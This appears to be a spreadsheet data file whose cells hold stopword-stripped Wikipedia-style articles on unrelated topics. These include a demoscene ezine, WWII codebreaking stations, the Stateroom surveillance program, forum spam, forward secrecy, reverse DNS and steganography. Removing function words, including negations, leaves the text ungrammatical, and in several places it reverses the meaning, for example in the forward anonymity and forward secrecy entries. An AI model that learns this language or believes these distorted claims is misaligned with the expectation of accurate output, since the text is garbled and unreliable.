intelligence battles coral sea, midway, aleutians. national security agency, central security service. prados, john (1995). combined fleet decoded: secret history american intelligence japanese navy world york: random house. isbn 0-679-43701-0. toll, (2011). pacific crucible: pacific, 1941–1942. york: norton. wilford, timothy (january 2002). "decoding pearl harbor: cryptanalysis challenge jn-25b 1941" (pdf). northern mariner/le marin nord. (1): 17–37. doi:10.25071/2561-5467.571. s2cid 247550000. external links "video interview donald showers rochefort's codebreaking team station hypo 1942". navy</t>
  </si>
  <si>
    <t>Static Line (magazine)</t>
  </si>
  <si>
    <t>static line email-based ascii ezine focused demoscene. monthly publication strong roots music aspect demoscene. issues starting july 1998 finishing march 2004. static line created effort fill void left closing demonews e-zine (closing february 1998) traxweekly e-zine (closing april 1996). regards succeeded followed similar format: ascii text-based magazine distributed e-mail. while never reaching large subscription rates traxweekly boasted, successful highlighted many aspects developing demoscene. history static line prior existence static line, creator, travis north (aka: coplan), wrote music review column e-mag known traxweekly. after traxweekly stopped publication 1996, coplan wrote articles published different magazines individually course next years. having already earned reputation music reviewer, many demosceners submitting songs review, even though magazine long since dried february 1998, demonews, another major demoscene e-mag, stopped publication. this left major void demoscene, damper coplan's plans planned bring column demonews publication. having nowhere publish column, began draw ideas form e-mag fill void left defunct traxweekly demonews. static line came fruition early 1998. invitation join mailing list posted hornet archive april 1998. official first issue e-mag sent e-mail mailing list july 1998. first issues static line released using majordomo mailing list kosmic free music foundation server. starting issue september 2000, e-mag grown popularity developed website would later become known scenespot. distribution online archives managed server.in mid-2003, coplan offered editing position, personal reasons, anyone willing carry management static line magazine. position taken ciaran hamilton collver. first issue released editors issue june 2003. november year, issue last issue released collver co-editor. website model demoscene news articles grew advanced, ascii e-zine format decreased popularity amongst involved demoscene. newer contributors demoscene attracted format static line known for, article contributions decreased volume. such, never able maintain monthly release rate previous years. magazine continued issues closed ciaran longer time maintain magazine, person willing take editor's chair. issue #52, release march 2004, official last issue static line. scenespot static line grew popularity, grew apparent would maintain success email-only publication. late 1999, concept model demoscene portal developed coplan ranger rick (benjamin reed, usa). originally, intent scenespot front-end static line, links archives subscription pages. grew news center discussion forums many participated north american demoscene. discussion home pilgrimage demo party first years. scenespot never grew popularity magazine held. after difficulties getting portal ground, scenespot closed doors early 2006. references external links archive static line issues static line files scene.org</t>
  </si>
  <si>
    <t>Floradora</t>
  </si>
  <si>
    <t>"floradora", also called keyword, doubly enciphered diplomatic code used germans second world war. allies used tabulating equipment, created ibm, break code period year 1941 1942. references budiansky, stephen. battle wits: complete story codebreaking world simon schuster, 2000 allies broke german diplomatic cipher floradora. michael cowan</t>
  </si>
  <si>
    <t>Stateroom (surveillance program)</t>
  </si>
  <si>
    <t>stateroom code name highly secretive signals intelligence collection program involving interception international radio, telecommunications internet traffic. operated diplomatic missions signatories ukusa agreement members echelon network including australia, zealand, united kingdom, canada united states.in almost hundred u.s. embassies consulates worldwide, stateroom operations conducted special collection service (scs), unit jointly operated central intelligence agency (cia) national security agency (nsa).according documents leaked edward snowden, true mission stateroom personnel generally revealed rest diplomatic staff facilities assigned. members australian signals directorate (asd), formerly known defence signals directorate (dsd) communications security establishment (cse) government communications headquarters (gchq) special collection service (scs) government communications security bureau (gcsb) operations note: list locations following section non-exhaustive, includes publicly disclosed information. australia collection signals intelligence australian embassies high commissions occurs capital cities across east asia southeast asia, namely: bangkok (thailand), beijing (china), dili (east timor), hanoi (vietnam), jakarta (indonesia), kuala lumpur (malaysia), port moresby (papua guinea) canada 1980s, surveys conducted canada's agency pick canadian embassies suitable function surveillance posts. zealand march 2015, zealand's gcsb agency secret listening post, codenamed "caprica", zealand high commission honiara, capital solomon islands. "caprica" outpost reportedly modeled nsa's stateroom outposts selected united states embassies across world. united kingdom 2013, british embassies consulates following capital cities known contain clandestine surveillance facilities: berlin (germany)data collected britain sent relay facility croughton northamptonshire, england, transmitted data center jointly operated u.s. central intelligence agency u.s. national security agency college park, maryland. united states united states, u.s. special collection service (scs) contributes stateroom. jointly operated central intelligence agency (cia) national security agency (nsa). november 2013, dutch newspaper handelsblad released secret presentation leaked edward snowden, shows presence operations numerous u.s. diplomatic missions located following cities: athens (greece), bangkok (thailand), berlin (germany), brasília (brazil), budapest (hungary), frankfurt (germany), geneva (switzerland), lagos (nigeria), milan (italy), delhi (india), paris (france), prague (czech republic), vienna (austria), zagreb (croatia). october 2013, reports former contractor edward snowden revelation systematically wiretapped chancellor germany angela merkel's private cell phone period years, among activities wiretap systematically record large amounts european south american leaders' citizens' communications.other locations include baku (azerbaijan), kyiv (ukraine), madrid (spain), moscow (russia), pristina (kosovo), rome (italy), sarajevo (bosnia), tbilisi (georgia), tirana (albania). disclosure edward snowden existence stateroom revealed october 2013 former contractor edward snowden, initiated global surveillance disclosure. ...these sites small size number personnel staffing them. they covert, true mission known majority diplomatic staff facility assigned. reactions zealand damien rogers, former senior adviser zealand intelligence agency government communications security bureau (gcsb) said surprised hear "stateroom" codeword location associated sites published media, revelations would cause "anxiety concern" directors five intelligence agencies ukusa agreement. nicky hager, zealand investigative journalist exposed echelon surveillance system, confirmed surveillance operations conducted intelligence agencies five eyes quite time. australia spokesman australia's department foreign affairs trade said: long-standing practice australian governments comment intelligence matters." australian prime minister tony abbott told reporters "every australian governmental agency, every australian official home abroad operates accordance law, that's assurance give people home abroad". canada government representatives declined comment directly leak. spokeswoman canada's defence minister nicholson declined comment. china chunying, spokeswoman china's foreign ministry, reacted angrily demanded foreign entities personnel china "strictly abide" vienna convention diplomatic relations, vienna convention consular relations international treaties. germany german foreign minister guido westerwelle summoned britain's ambassador germany, simon mcdonald, explain clarify presence britain's eavesdropping centre berlin. indonesia indonesian foreign minister marty natalegawa protested surveillance program, told media "such action breach security, also serious violation diplomatic norms ethics, certainly tune spirit friendly relations nations." malaysia malaysia's minister home affairs, ahmad zahid hamidi, said snowden's revelation "sensitive issue since involves several countries". solomon islands solomon islands' chief staff, robert iroga, said zealand government's actions damaged zealand's image "friendly government" south pacific. added communications within inner circle solomons government "highly secret information" rightfully belong solomon islanders. addition, iroga accused zealand officials bullying-behavior trade negotiations alleged zealand shared information regarding taiwanese money china. thailand thailand's national security council asserted forms surveillance considered acts criminality thailand. gallery also global surveillance list government surveillance projects mass surveillance mass surveillance united kingdom mass surveillance united states references</t>
  </si>
  <si>
    <t>Flyposting</t>
  </si>
  <si>
    <t>flyposting (also known wild posting bill posting) guerrilla marketing tactic advertising posters united states, posters also commonly referred wheatpaste posters wheatpaste often used adhere posters. posters adhered construction site barricades, building façades alleyways. advertisement posters posters used typically made lightweight paper printed using flexography, digital printing screen printing. modern printing techniques enable posters feature full-colour designs, halftones, photographs, making popular advertising concerts, political messages, commercial advertisements special events. increasing number posters advertise anything instead feature artwork, inspirational positive messages, religious messages.it advertising tactic mostly used small businesses promoting concerts political activist groups, occasions international companies subcontracted local advertising agencies flyposting jobs order caught illegal behavior, form guerrilla marketing. 2004, sony music threatened anti-social behaviour orders camden borough council illegal flyposting. legislation many countries, illegal place posters private property without consent property owner, post public property without sign permit local government. some areas, however, public bulletin boards notices posted.in effort discourage illegal flyposting, surfaces risk sometimes permanently signed post bills (usa), flyposting (uk), france défense d'afficher juillet 1881, referring law. while flyposting commonplace, often viewed nuisance landlords take civil action protect property rights. particularly noteworthy incident type occurred boston, massachusetts. case 2007 boston mooninite scare, advertisers placed electronic signboards without notifying local authorities, prompting costly reaction boston police bomb squad signs mistaken bombs. banner with rise world wide web, much advertising shifted online. some advertising agencies drawn similarities flyposting certain types adware, invasive consumers. also election litter publicity subvertising references</t>
  </si>
  <si>
    <t>Foreign instrumentation signals intelligence</t>
  </si>
  <si>
    <t>foreign instrumentation signature intelligence, fisint (foreign instrumentation signature intelligence) intelligence interception foreign electromagnetic emissions associated testing operational deployment foreign aerospace, surface, subsurface systems. since deals signals communicational content, subset communications intelligence (comint), which, turn, subset sigint. unlike general comint signals, content fisint signals regular human language, rather machine machine (instrumentation) language combination regular human language instrumentation language. fisint also considered subset masint (measurement signature intelligence). typical examples communication include: telemetry data (telint). missiles, satellites remotely monitored devices often transmit streams data concerning location, speed, engine status metrics. video data links. these uavs satellites used reconnaissance. remote access control transmissions, remote keyless systems wireless traffic light control systems. command signals used teleoperation, control aerial vehicles, missiles remotely-controlled robots. telecommunication telecommunication, term fisint following meanings: intelligence information derived electromagnetic emissions associated testing operational deployment foreign aerospace, surface, subsurface systems. technical information intelligence information derived intercept foreign instrumentation signals intended recipients. foreign instrumentation signals intelligence category signals intelligence. foreign instrumentation signals include limited signals telemetry, beaconry, electronic interrogators, tracking/fusing/arming/firing command systems, video data links. also sigint: signals intelligence comint: communications intelligence elint: electronic intelligence humint: human intelligence imint: imagery intelligence masint: measurement signature intelligence missile guidance intelligence collection management references this article incorporates public domain material general services administration document: "federal standard 1037c". this article incorporates public domain material united states department defense document: "dictionary military associated terms".</t>
  </si>
  <si>
    <t>Fort Omaha Guardhouse</t>
  </si>
  <si>
    <t>fort omaha guardhouse built 1883 handle native american, civilian military prisoners department platte housed fort omaha. located 5700 north 30th street north omaha, nebraska, guardhouse named omaha landmark city omaha landmarks heritage preservation commission 1982. also contributing property fort omaha historic district, listed national register historic places. about placed front gates, fort omaha guardhouse built part design typical western united states military forts 19th century. originally constructed large l-shaped building, rear east wing building, closest north 30th street, dissected building around 1914. used storage facility many years, main section guardhouse converted offices.big spotted horse captive 1880s. famous prisoner guardhouse ponca chief standing bear trial standing bear crook. when general crook visited guardhouse appalled terrible conditions standing bear tribal members staying in.several prisoners, including army deserters, housed next forty years. there also several prisoners land jumpers claimed stakes black hills 1875. also history omaha references external links historic postcard</t>
  </si>
  <si>
    <t>Forum spam</t>
  </si>
  <si>
    <t>forum spam consists posts internet forums contains related unrelated advertisements, links malicious websites, trolling abusive otherwise unwanted information. forum spam usually posted onto message boards automated spambots manually unscrupulous intentions intent spam front readers would otherwise anything intentionally. types forum spambots surf looking guestbooks, wikis, blogs, forums forms submit spam links these spambots often technology bypass captchas present. some messages targeted towards readers involve techniques target marketing even phishing. these automated schemes make difficult users tell real posts generated ones. some spam messages also simply contain tags hyperlinks intended boost search engine ranking rather target human readers. most forum spam consists links external sites dual goals increasing search engine visibility highly competitive advertising domains weight loss, pharmaceuticals, gambling, pornography, real estate loans, generating traffic commercial websites. some links contain code track spambot's identity sale goes spammer behind spambot collect commission. spam posts contain anything single link dozens links. text content minimal, usually innocuous unrelated forum's topic. sometimes posts made threads revived spammer solely purpose spamming links. posts include text prevent post caught automated spam filters prevent posts consist solely external links submitted. alternatively, spam links posted user's signature, case spambot never post. link sits quietly signature field, likely harvested search engine spiders discovered forum administrators moderators. since november 2006, destructive forum wiki spam attack propagated inserting comments redirect domains automated posting script like xrumer. these domains redirect user pornographic websites. user clicks image attempts close website activex codec downloaded zlob trojan. spambot often bypass many safeguards administrators reduce amount spam posted. effects spam prevention deletions measurably increase workload forum administrators moderators. amount time resources spent keeping forum spam-free contributes significantly labor cost skill required running public forum. marginally profitable smaller forums permanently closed administrators. spam prevention techniques avoiding, removing, mitigating forum spam include: blacklisting services fspamlist, stopforumspam botscout keep databases addresses, usernames e-mail addresses used post spam register forum accounts. forum software query lists either deny posts registration, submit request human moderation. this similar dnsbl services. flood control forces users wait short interval making posts forum, thus preventing spambots overwhelming forum repeated spam messages. registration control mechanisms used forums include: captcha (visual confirmation) routines forum registration pages help prevent spambots carrying automated registrations. simple captcha systems display alphanumeric characters proven vulnerable optical character recognition software scramble characters appear effective. textual confirmation alternative captcha user answers random questions prove he/she spambot. confirmation e-mails registering users prior allowing user first either containing site-generated password activation code/link. manual registration approval administrators account. authoritative voice, using external filtering service verdict data spam not. posting limits users, prevent flooding limit posting certain users (e.g., registered users). registration restrictions include: denial registration certain domains major source spambots, even domain extensions .ru, .br, .biz. manual examination registrants several indicators. spammers often delay email confirmation several hours, humans confirm promptly. spambots tend create relatively noisy user names (e.g., john84731 johnbasskeepsie john) order ensure uniqueness. using search engine investigate usernames hits recognized spambots forums. changing technical details forum software confuse bots example, changing "agreed=true" "mode=agreed" registration page phpbb. blocking posts registrations contain certain blacklisted words. monitoring used untrusted posters, like anonymous posts newly registered users. useful technique proactive detection well-known spammer proxies query search engine show pages specialize listing proxies. redirecting spammers "spam subforums" direct spam away human users main site. disabling signature option. also spamming unsolicited electronic messages, especially advertisements internet forum online discussion site captcha computer test determine whether user human spambot shitposting intentionally poor-quality social media posts references</t>
  </si>
  <si>
    <t>Forward anonymity</t>
  </si>
  <si>
    <t>forward anonymity property cryptographic system prevents attacker recorded past encrypted communications discovering contents participants future. this property analogous forward secrecy. example system uses forward anonymity public cryptography system, public well-known used encrypt message, unknown private used decrypt system, keys always said compromised, messages participants still unknown anyone without corresponding private key. contrast, example system satisfies perfect forward secrecy property compromise attacker (and consequent decryption messages encrypted key) undermine security previously used keys. forward secrecy refer protecting content message, rather protection keys used decrypt messages. history originally introduced whitfield diffie, paul oorschot, michael james wiener describe property (station-to-station protocol) involving long term secret, either private shared password. public cryptography public cryptography common form forward anonymous system. used pass encrypted messages, preventing information message discovered message intercepted attacker. uses keys, public private key. public published, used anyone encrypt plaintext message. private well known, used decrypt cyphertext. public cryptography known asymmetric decryption algorithm different keys used perform opposing functions. public cryptography popular because, computationally easy create pair keys, extremely difficult determine private knowing public key. therefore, public well known allow messages intercepted decrypted. this forward anonymous system compromised (the public key) compromise anonymity system. trust variation public cryptography system trust, user public private key. messages sent encrypted using intended recipient's public key, recipient's private decrypt message. they also signed senders private key. this creates added security becomes difficult attacker pretend user, lack private signature indicates non-trusted user. limitations forward anonymous system necessarily mean wholly secure system. successful cryptanalysis message sequence messages still decode information without private long term secret. news forward anonymity, along privacy-protecting measures, received burst media attention leak classified information edward snowden, beginning june, 2013, indicated fbi, specially crafted backdoors software computer systems, conducting mass surveillance large parts population united states (see mass surveillance united states), europe, asia, parts world. they justified practice catch predatory pedophiles. opponents practice argue leaving back door enforcement increases risk attackers able decrypt information, well questioning legality constitution, specifically form illegal search seizure. references</t>
  </si>
  <si>
    <t>Forward secrecy</t>
  </si>
  <si>
    <t>cryptography, forward secrecy (fs), also known perfect forward secrecy (pfs), feature specific agreement protocols gives assurances session keys compromised even long-term secrets used session exchange compromised. https, long-term secret typically private server. forward secrecy protects past sessions future compromises keys passwords. generating unique session every session user initiates, compromise single session affect data exchanged specific session protected particular key. this sufficient forward secrecy additionally requires long-term secret compromise affect security past session keys. forward secrecy protects data transport layer network uses common transport layer security protocols, including openssl, long-term secret keys compromised, heartbleed security bug. forward secrecy used, encrypted communications sessions recorded past cannot retrieved decrypted long-term secret keys passwords compromised future, even adversary actively interfered, example man-in-the-middle attack. value forward secrecy protects past communication. this reduces motivation attackers compromise keys. instance, attacker learns long-term key, compromise detected long-term revoked updated, relatively little information leaked forward secure system. value forward secrecy depends assumed capabilities adversary. forward secrecy value adversary assumed able obtain secret keys device (read access) either detected unable modify session keys generated device (full compromise). cases adversary read long-term keys device also able modify functioning session generator, backdoored dual elliptic curve deterministic random generator. adversary make random number generator predictable, past traffic protected future traffic compromised. value forward secrecy limited assumption adversary attack server stealing keys modifying random number generator used server also limited assumption adversary passively collect traffic communications link active using man-in-the-middle (mitm) attack. forward secrecy typically uses ephemeral diffie-hellman exchange prevent reading past traffic. ephemeral diffie-hellman exchange often signed server using static signing key. adversary steal obtain court order) static (long term) signing key, adversary masquerade server client client server implement classic man-in-the-middle attack. history term "perfect forward secrecy" coined günther 1990 discussed whitfield diffie, paul oorschot, michael james wiener 1992 used describe property station-to-station protocol.forward secrecy also used describe analogous property password-authenticated agreement protocols long-term secret (shared) password.in 2000 ieee first ratified ieee 1363, establishes related one-party two-party forward secrecy properties various standard agreement schemes. definition encryption system property forward secrecy plain-text (decrypted) inspection data exchange occurs agreement phase session initiation reveal used encrypt remainder session. example following hypothetical example simple instant messaging protocol employs forward secrecy: alice generate pair long-term, asymmetric public private keys, verify public-key fingerprints person already-authenticated channel. verification establishes confidence claimed owner public actual owner. alice exchange algorithm diffie–hellman, securely agree ephemeral session key. they keys step authenticate another process. alice sends message, encrypting symmetric cipher using session negotiated step decrypts alice's message using negotiated step process repeats message sent, starting step (and switching alice bob's roles sender/receiver appropriate). step never repeated.forward secrecy (achieved generating session keys message) ensures past communications cannot decrypted keys generated iteration step compromised, since used encrypt single message. forward secrecy also ensures past communications cannot decrypted long-term private keys step compromised. however, masquerading alice would possible going forward occurred, possibly compromising future messages. attacks forward secrecy designed prevent compromise long-term secret affecting confidentiality past conversations. however, forward secrecy cannot defend successful cryptanalysis underlying ciphers used, since cryptanalysis consists finding decrypt encrypted message without key, forward secrecy protects keys, ciphers themselves. patient attacker capture conversation whose confidentiality protected public-key cryptography wait underlying cipher broken (e.g. large quantum computers could created allow discrete logarithm problem computed quickly). this would allow recovery plaintexts even system employing forward secrecy. non-interactive forward-secure exchange protocols face additional threats relevant interactive protocols. message suppression attack, attacker control network store messages preventing reaching intended recipient; messages never received, corresponding private keys destroyed punctured, compromise private lead successful decryption. proactively retiring private keys schedule mitigates, eliminate, attack. malicious exhaustion attack, attacker sends many messages recipient exhausts private material, forcing protocol choose failing closed (and enabling denial service attacks) failing open (and giving amount forward secrecy). non-interactive forward secrecy most exchange protocols interactive, requiring bidirectional communication parties. protocol permits sender transmit data without first needing receive replies recipient called non-interactive, asynchronous, zero round trip (0-rtt).interactivity onerous applications—for example, secure messaging system, desirable store-and-forward implementation, rather requiring sender recipient online time; loosening bidirectionality requirement also improve performance even strict requirement, example connection establishment resumption. these cases stimulated interest non-interactive exchange, and, forward security desirable property exchange protocol, non-interactive forward secrecy. this combination identified desirable since least 1996. however, combining forward secrecy non-interactivity proven challenging; suspected forward secrecy protection replay attacks impossible non-interactively, shown possible achieve three desiderata.broadly, approaches non-interactive forward secrecy explored, pre-computed keys puncturable encryption.with pre-computed keys, many pairs created public keys shared, private keys destroyed message received using corresponding public key. this approach deployed part signal protocol.in puncturable encryption, recipient modifies private receiving message private cannot read message public unchanged. ross anderson informally described puncturable encryption scheme forward secure exchange 1997, green miers (2015) formally described system, building related scheme canetti, halevi katz (2003), modifies private according schedule messages sent previous periods cannot read private later period. green miers (2015) make hierarchical identity-based encryption attribute-based encryption, günther (2017) different construction based hierarchical identity-based scheme. dallmeier (2020) experimentally found modifying quic 0-rtt forward secure replay-resistant exchange implemented puncturable encryption incurred significantly increased resource usage, much make practical infeasible. weak perfect forward secrecy weak perfect forward secrecy (wpfs) weaker property whereby agents' long-term keys compromised, secrecy previously established session-keys guaranteed, sessions adversary actively interfere. this notion, distinction forward secrecy introduced hugo krawczyk 2005. this weaker definition implicitly requires full (perfect) forward secrecy maintains secrecy previously established session keys even sessions adversary actively interfere, attempted middle. protocols forward secrecy present several major protocol implementations, optional feature ipsec (rfc 2412). off-the-record messaging, cryptography protocol library many instant messaging clients, well omemo provides additional features multi-user functionality clients, provide forward secrecy well deniable encryption. transport layer security (tls), cipher suites based diffie–hellman exchange (dhe-rsa, dhe-dsa) elliptic curve diffie–hellman exchange (ecdhe-rsa, ecdhe-ecdsa) available. theory, choose appropriate ciphers since sslv3, everyday practice many implementations refused offer forward secrecy provide encryption grade. leaves ephemeral diffie–hellman (finite field elliptic curve variants) remaining exchange mechanism, order ensure forward secrecy.openssl supports forward secrecy using elliptic curve diffie–hellman since version 1.0, computational overhead approximately initial handshake.the signal protocol uses double ratchet algorithm provide forward secrecy.on hand, among popular protocols currently use, support forward secrecy. forward secrecy seen important security feature several large internet information providers. since late 2011, google provided forward secrecy default users gmail service, google docs service, encrypted search services. since november 2013, twitter provided forward secrecy users. wikis hosted wikimedia foundation provided forward secrecy users since july 2014 requiring forward secrecy since august 2018. facebook reported part investigation email encryption that, 2014, hosts support starttls also provide forward secrecy. 1.3, published august 2018, dropped support ciphers without forward secrecy. february 2019, 96.6% servers surveyed support form forward secrecy, 52.1% forward secrecy browsers.at wwdc 2016, apple announced apps would need transport security (ats), feature enforces https transmission. specifically, requires encryption cipher provides forward secrecy. became mandatory apps january 2017.the signal messaging application employs forward secrecy protocol, notably differentiating messaging protocols based pgp. also forward anonymity diffie–hellman exchange elliptic curve diffie–hellman references bibliography anderson, ross (2002). "two remarks public cryptology" (pdf). canetti, ran; halevi, shai; katz, jonathan (2003). forward-secure public-key encryption scheme". advances cryptology eurocrypt 2003. lecture notes computer science. vol. 2656. 255–271. doi:10.1007/3-540-39200-9_16. isbn 978-3-540-14039-9. green, matthew miers, (2015). "forward secure asynchronous messaging puncturable encryption". 2015 ieee symposium security privacy. 305–320. doi:10.1109/sp.2015.26. isbn 978-1-4673-6949-7. s2cid 9171925. günther, felix; hale, britta; jager, tibor; lauer, sebastian (2017). "0-rtt exchange full forward secrecy" (pdf). {{cite journal}}: cite journal requires |journal= (help) back, adam september 1996). "non-interactive forward secrecy". cypherpunks (mailing list). boyd, colin; gellert, august 2020). modern view forward security". computer journal (published april 2021). (4): 639–652. doi:10.1093/comjnl/bxaa104. hdl:11250/2730309. archived original june 2021. dallmeier, fynn; drees, gellert, kai; handrik, tobias; jager, tibor; klauke, jonas; nachtigall, simon; renzelmann, timo; wolf, rudi (2020). "forward-secure 0-rtt goes live: implementation performance analysis quic" (pdf). {{cite journal}}: cite journal requires |journal= (help) external links 2412 ietf, orman. oakley determination protocol perfect forward secrecy block secure pages, uses computerworld june 2013 ssl: intercepted today, decrypted tomorrow netcraft june 2013 deploying forward secrecy labs june 2013 labs test browsers labs test servers</t>
  </si>
  <si>
    <t>Station CAST</t>
  </si>
  <si>
    <t>station cast united states navy signals monitoring cryptographic intelligence fleet radio unit cavite navy yard philippines, cavite captured japanese forces 1942, world important part allied intelligence effort, addressing japanese communications expanded china rest pacific theaters. japanese advances philippines threatened cast, staff services progressively transferred corregidor manila bay, eventually newly formed us-australian station, frumel melbourne, australia.station cast originally located shanghai evacuated cavite early 1941 part navy's disengagement china. prior war, cast navy's east cryptographic operation, op-20-g naval intelligence section washington. located navy yard manila moved tunnels corregidor, japanese attacks increased. station cast possessed purple machines produced army. cryptanalytic problems facing united states pacific prior world largely japanese. early decision op-20-g divided responsibility japanese cryptanalysis amongst various stations. station cast manila philippines), station hypo (pearl harbor, hawaii) op-20-02, op-20-g washington, shared cryptanalytic duties. other stations guam, puget sound bainbridge island, etc.) tasked staffed signals interception traffic analysis. purple diplomatic traffic army break highest security japanese diplomatic cypher (called purple analysts) produced interesting intelligence, little military value (except ambassador hiroshi oshima's despatches germany); none tactical value, much direct political value foreign office japan thought ultra-nationalists effective charge japanese foreign military policy, unreliable. furthermore, decrypts purple traffic, eventually called magic, rather capriciously distributed high level officials washington, general, poorly used. able build several purple machine equivalents distribution machines since thought controversial. sent station cast. after entered war, went bletchley park, center british cryptographic work. sent east combined bureau (fecb) singapore, lost fall singapore japanese navy crypto systems: jn-25 stations hypo cast assigned responsibility work japanese navy systems, agreement united kingdom netherlands share effort, worked crypto groups hong kong singapore (far east combined bureau) batavia (kamer room 14). prior attack pearl harbor, amount available traffic low, little progress made important japanese navy system, called analysts jn-25. jn-25 used high level operations: movement planning commands, instance. superencrypted code, eventually two-book system, joint cryptanalytic progress slow. jn-25b introduced december 1940, broken immediately fecb additives changed. most references cite messages partially sometimes completely) decrypted prior december 1941, time edition system went effect sent cryptanalysts back beginning. after december 1941, considerably jn-25 traffic japanese navy operational tempo increased geographically expanded, progress went better. fecb contribution stopped crypto station could relocated singapore ceylon, cast, hypo, dutch batavia, conjunction op-20-g, made steady progress. cast invasion philippines station cast personnel equipment moved manila tunnels corregidor japanese approached spent next months working there. eventually, destroyed equipment (some punched card machines said among gear shoved harbor) evacuated submarine australia, service frumel. some personnel also worked central bureau, supplying signals intelligence macarthur's south west pacific area (command). references</t>
  </si>
  <si>
    <t>Forward-confirmed reverse DNS</t>
  </si>
  <si>
    <t>forward-confirmed reverse (fcrdns), also known full-circle reverse dns, double-reverse dns, iprev, networking parameter configuration given address forward (name-to-address) reverse (address-to-name) domain name system (dns) entries match other. this standard configuration expected internet standards supporting many dns-reliant protocols. david barr published opinion 1912 (informational) recommending best practice administrators, formal requirements codified within standard itself.a fcrdns verification create weak form authentication valid relationship owner domain name owner network given address. while weak, authentication strong enough used whitelisting purposes spammers phishers cannot usually by-pass verification zombie computers email spoofing. that reverse might verify, usually part another domain claimed domain name. using isp's mail server relay solve reverse problem, requirement forward reverse lookup sending relay match, related from-field sending domain messages relays. other methods establishing relation address domain email sender policy framework (spf) record. isps cannot configure reverse generate problems hosts networks, virtue unable support applications protocols require reverse agree corresponding aaaa) record. isps cannot provide reverse ultimately limiting ability client base internet services provide effectively securely. applications most e-mail mail transfer agents (server software) fcrdns verification valid domain name, "received:" trace header field. some e-mail mail transfer agents perform fcrdns verification domain name given smtp helo ehlo commands. this violate 2821 e-mail usually rejected default. sender policy framework email anti-forgery system uses fcrdns check "ptr:" mechanism. however, "ptr:" mechanism discouraged since first standardization 2006 4408). some e-mail spam filters fcrdns checks authentication method domain names whitelisting purposes, according 8601, example. spamcop uses fcrdns check, sometimes causes problems spamcop users also customers internet service providers provide properly matching rdns records mail servers. some ftp, telnet wrapper servers perform fcrdns checks.[3] some servers perform fcrdns checks prevent abuse. references</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>steganography (listen) steg-ə-nog-rə-fee) practice concealing message within another message physical object. computing/electronic contexts, computer file, message, image, video concealed within another file, message, image, video. word steganography comes greek steganographia, combines words steganós (στεγανός), meaning "covered concealed", -graphia (γραφή) meaning "writing".the first recorded term 1499 johannes trithemius steganographia, treatise cryptography steganography, disguised book magic. generally, hidden messages appear part something else: images, articles, shopping lists, cover text. example, hidden message invisible visible lines private letter. some implementations steganography lack shared secret forms security obscurity, key-dependent steganographic schemes adhere kerckhoffs's principle.the advantage steganography cryptography alone intended secret message attract attention object scrutiny. plainly visible encrypted messages, matter unbreakable are, arouse interest incriminating countries encryption illegal.whereas cryptography practice protecting contents message alone, steganography concerned concealing fact secret message sent contents. steganography includes concealment information within computer files. digital steganography, electronic communications include steganographic coding inside transport layer, document file, image file, program, protocol. media files ideal steganographic transmission large size. example, sender might start innocuous image file adjust color every hundredth pixel correspond letter alphabet. change subtle someone specifically looking unlikely notice change. history first recorded uses steganography traced back greece, herodotus mentions examples histories. histiaeus sent message vassal, aristagoras, shaving head trusted servant, "marking" message onto scalp, sending hair regrown, instruction, "when thou come miletus, aristagoras shave head, look thereon." additionally, demaratus sent warning forthcoming attack greece writing directly wooden backing tablet applying beeswax surface. tablets common reusable writing surfaces, sometimes used shorthand. work polygraphiae, johannes trithemius developed so-called "ave-maria-cipher" hide information latin praise god. "auctor sapientissimus conseruans angelica deferat nobis charitas potentissimi creatoris" example contains concealed word vicipedia. techniques physical steganography widely used centuries. some examples include: hidden messages paper written secret inks. hidden messages distributed, according certain rule key, smaller parts (e.g. words letters) among words less suspicious cover text. this particular form steganography called null cipher. messages written morse code yarn knitted piece clothing worn courier. messages written envelopes area covered postage stamps. early days printing press, common different typefaces printed page printer enough copies letters typeface. thus, message could hidden using different typefaces, normal italic. during world espionage agents used photographically-produced microdots send information back forth. microdots typically minute (less size period produced typewriter). world microdots embedded paper covered adhesive, collodion reflective detectable viewing glancing light. alternative techniques included inserting microdots slits edge postcards. during world velvalee dickinson, japan york city, sent information accommodation addresses neutral south america. dealer dolls, letters discussed quantity type doll ship. stegotext doll orders, concealed "plaintext" encoded gave information ship movements, etc. case became somewhat famous became known doll woman. during world photosensitive glass declared secret, used transmitting information allied armies. jeremiah denton repeatedly blinked eyes morse code 1966 televised press conference forced american prisoner-of-war north vietnamese captors, spelling "t-o-r-t-u-r-e". that confirmed first time naval intelligence americans north vietnamese torturing american prisoners-of-war. 1968, crew members pueblo intelligence ship, held prisoners north korea, communicated sign language staged photo opportunities, inform united states defectors captives north koreans. photos presented crew members gave "the finger" unsuspecting north koreans, attempt discredit photos showed smiling comfortable. 1985, klezmer saxophonist smuggled secrets soviet union coding pitches musical notes sheet music. digital messages concealing messages within lowest bits noisy images sound files. survey evaluation relevant literature/techniques topic digital image steganography found here. concealing data within encrypted data within random data. message conceal encrypted, used overwrite part much larger block encrypted data block random data unbreakable cipher like one-time generates ciphertexts look perfectly random without private key). chaffing winnowing. mimic functions convert file statistical profile another. this thwart statistical methods help brute-force attacks identify right solution ciphertext-only attack. concealed messages tampered executable files, exploiting redundancy targeted instruction set. pictures embedded video material (optionally played slower faster speed). injecting imperceptible delays packets sent network keyboard. delays keypresses applications (telnet remote desktop software) mean delay packets, delays packets used encode data. changing order elements set. content-aware steganography hides information semantics human user assigns datagram. these systems offer security nonhuman adversary/warden. blog-steganography. messages fractionalized (encrypted) pieces added comments orphaned web-logs boards social network platforms). case, selection blogs symmetric sender recipient using; carrier hidden message whole blogosphere. modifying echo sound file (echo steganography). steganography audio signals. image bit-plane complexity segmentation steganography including data ignored sections file, logical carrier file. adaptive steganography: skin tone based steganography using secret embedding angle. embedding data within control-flow diagram program subjected control flow analysis digital text using non-printing unicode characters zero-width joiner (zwj) zero-width non-joiner (zwnj). these characters used joining disjoining letters arabic persian, used roman alphabets hiding information meaning roman alphabets: "zero-width" displayed. zwnj represent "0". this also done space, figure space whitespace characters. embedding secret message pattern deliberate errors marked corrections word processing document, using word processor's change tracking feature. 2020, zhongliang yang discovered text generative steganography, quality generated steganographic text optimized certain extent, make overall statistical distribution characteristics generated steganographic text different normal text, making easier recognized. they named phenomenon perceptual-statistical imperceptibility conflict effect (psic effect). hiding image within soundfile image text converted soundfile, analysed spectrogram reveal image. various artists used method conceal hidden pictures songs, aphex twin "windowlicker" nine inch nails album year zero. social steganography communities social government taboos censorship, people cultural steganography—hiding messages idiom, culture references, messages share publicly assume monitored. this relies social context make underlying messages visible certain readers. examples include: hiding message title context shared video image. misspelling names words popular media given week, suggest alternate meaning. 